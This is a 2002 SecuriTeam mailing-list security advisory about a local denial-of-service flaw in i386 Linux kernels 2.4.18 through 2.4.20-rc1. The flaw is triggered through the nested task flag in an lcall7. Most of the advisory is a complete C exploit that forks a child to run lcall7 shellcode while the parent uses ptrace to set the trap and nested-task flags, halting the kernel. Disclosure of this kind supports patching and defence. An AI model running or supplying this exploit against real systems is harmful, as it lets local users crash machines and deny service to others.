[EXPL] i386 Linux Kernel DoS (Local)

From: support@securiteam.com
Date: 11/17/02

  • Next message: support@securiteam.com: "[NEWS] Buffalo AP Denial of Service" 
    From: support@securiteam.com
To: list@securiteam.com
Date: 17 Nov 2002 21:07:17 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      i386 Linux Kernel DoS (Local)
    ------------------------------------------------------------------------

    SUMMARY

    A vulnerability in the Linux kernel allows local attackers to cause it to
    halt. The flaw seems to be related to the kernel's handling of the nested
    task (NT) flag inside an lcall7.

    DETAILS

    Vulnerable systems:
     * Linux Kernel version 2.4.18 and prior
     * Linux Kernel version 2.4.19
     * Linux Kernel version 2.4.20-rc1

    Exploit:
    #include <sys/ptrace.h>

    struct user_regs_struct {
            long ebx, ecx, edx, esi, edi, ebp, eax;
            unsigned short ds, __ds, es, __es;
            unsigned short fs, __fs, gs, __gs;
            long orig_eax, eip;
            unsigned short cs, __cs;
            long eflags, esp;
            unsigned short ss, __ss;
    };

    int main( void )
    {
        int pid;
        char dos[] = "\x9A\x00\x00\x00\x00\x07\x00";
        void (* lcall7)( void ) = (void *) dos;
        struct user_regs_struct d;

        if( ! ( pid = fork() ) )
        {
            usleep( 1000 );
            (* lcall7)();
        }
        else
        {
            ptrace( PTRACE_ATTACH, pid, 0, 0 );
            while( 1 )
            {
                wait( 0 );
                ptrace( PTRACE_GETREGS, pid, 0, &d );
                d.eflags |= 0x4100; /* set TF and NT */
                ptrace( PTRACE_SETREGS, pid, 0, &d );
                ptrace( PTRACE_SYSCALL, pid, 0, 0 );
            }
        }

        return 1;
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:DEVINE@iie.cnam.fr>
    Christophe Devine.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.